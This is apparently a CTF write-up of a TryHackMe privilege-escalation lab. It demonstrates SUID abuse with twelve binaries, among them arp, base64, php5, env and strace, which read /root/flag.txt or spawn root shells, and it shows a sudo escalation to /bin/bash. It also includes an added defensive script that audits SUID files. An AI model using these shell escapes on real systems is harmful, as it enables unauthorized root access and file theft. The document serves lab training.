Hello there, it has been a while since my last update; welcome back to another THM CTF writeup. Today we are going for the easiest privilege escalation (privesc) room on the entire THM server. As the author, SherlockSec, mentioned, there are tons of ways to privesc the machine. Just a small tip: I referred to GTFOBins for this challenge; the site contains a list of shell-escaping commands. I have broken the write-up into two major sections, SUID and sudo. Without further ado, let’s get started.
Part 1: SUID
SUID exploitation is quite common on Linux, especially when administrators misconfigure the important binaries under /bin and /sbin. If you want to know more about SUID exploitation, refer to this article. To do a quick search for SUID files on the system, simply use the following command:
$ find / -perm /4000 2>/dev/null
The argument -perm /4000 matches files whose mode includes 4000, which is the SUID bit, and we skip all ‘permission denied’ errors by redirecting stderr with 2>/dev/null. Alternatively, you can use the mnemonic form:
$ find / -perm /u=s 2>/dev/null
Well, there are tons of SUID binaries to exploit. Always check GTFOBins and look for possible SUID file exploitation. Here is the list of SUID binaries that can be exploited.
- …… and anything you can find on GTFOBins.
For this instance, I’m going to show 12 SUID exploits as a demo; you can figure out the rest using GTFOBins.
SUID 1: arp
$ /usr/sbin/arp -v -f /root/flag.txt
SUID 2: cut
$ /usr/bin/cut -d "" -f1 /root/flag.txt
SUID 3: base64
$ /usr/bin/base64 /root/flag.txt | base64 --decode
SUID 4: tail
$ /usr/bin/tail /root/flag.txt
SUID 5: ul
$ /usr/bin/ul /root/flag.txt
SUID 6: shuf
Instead of reading the flag file like the previous SUID binaries, shuf is used to overwrite a file. This SUID command is quite useful for rewriting a configuration file that a lower-privileged user could not otherwise modify. No demo for this SUID.
SUID 7: php5
$ /usr/bin/php5 -r "pcntl_exec('/bin/sh');"
SUID 8: file
$ /usr/bin/file -m /root/flag.txt
SUID 9: tclsh8.5
$ /usr/bin/tclsh8.5
% exec cat /root/flag.txt
SUID 10: env
$ /usr/bin/env /bin/sh
SUID 11: diff
$ /usr/bin/diff --line-format=%L /dev/null /root/flag.txt
SUID 12: strace
$ /usr/bin/strace -o /dev/null /bin/sh
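As an added example (not the author's code), here is a small POSIX shell audit that runs the same find search from the start of Part 1 and flags any SUID file whose name matches one of the twelve binaries demonstrated above, so an administrator can spot bits that should be removed with chmod u-s. The watchlist and the root-directory argument are assumptions; the real GTFOBins list is much longer.

```shell
#!/bin/sh
# Added example: audit a directory tree for SUID files that are on a watchlist
# of known shell-escape / privileged-read binaries. Not part of the original
# write-up; the watchlist below is constructed from the twelve demos above.

# Constructed watchlist (assumption): the SUID binaries demonstrated in this post.
SUID_WATCHLIST="arp cut base64 tail ul shuf php5 file tclsh8.5 env diff strace"

# is_watched NAME -> exit status 0 if NAME is on the watchlist, 1 otherwise.
is_watched() {
    for w in $SUID_WATCHLIST; do
        [ "$1" = "$w" ] && return 0
    done
    return 1
}

# audit_suid ROOT -> prints one line per SUID file found under ROOT:
#   "RISK  <path>"  basename is on the watchlist (candidate for chmod u-s)
#   "INFO  <path>"  any other SUID file (review manually)
audit_suid() {
    root="${1:-/}"
    # Same search the write-up uses; stderr is dropped to hide
    # "permission denied" noise from directories we cannot read.
    find "$root" -type f -perm /4000 -print 2>/dev/null |
    while IFS= read -r f; do
        if is_watched "$(basename "$f")"; then
            echo "RISK  $f"
        else
            echo "INFO  $f"
        fi
    done
}

# count_risky ROOT -> number of watchlisted SUID files under ROOT.
count_risky() {
    audit_suid "$1" | grep -c '^RISK' || true
}
```

Run it as root against / to cover directories an unprivileged user cannot read; a RISK line is a binary whose SUID bit is almost never needed.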
Part 2: Sudo
Another privilege escalation method is the sudo command. A small tip here: always check /etc/sudoers (or run the visudo command) for any misconfiguration of user privileges. To check which sudo commands a lower-privileged user may run, simply punch in the following line:
$ sudo -l
Actually, it is rare to see this kind of thing in real life: the lower-privileged user can literally run anything with sudo. Similarly, you can check GTFOBins for sudo shell escapes. For this demo, I’m going to use bash as the sudo command.
$ sudo /bin/bash
That’s all for the quick write-up of the privesc playground. GTFOBins is definitely a useful site to check for privilege escalation in terms of SUID and sudo. One more thing: check out mzfr’s GTFOBins tool; he did a great job of bringing the site to the terminal. Until next time 🙂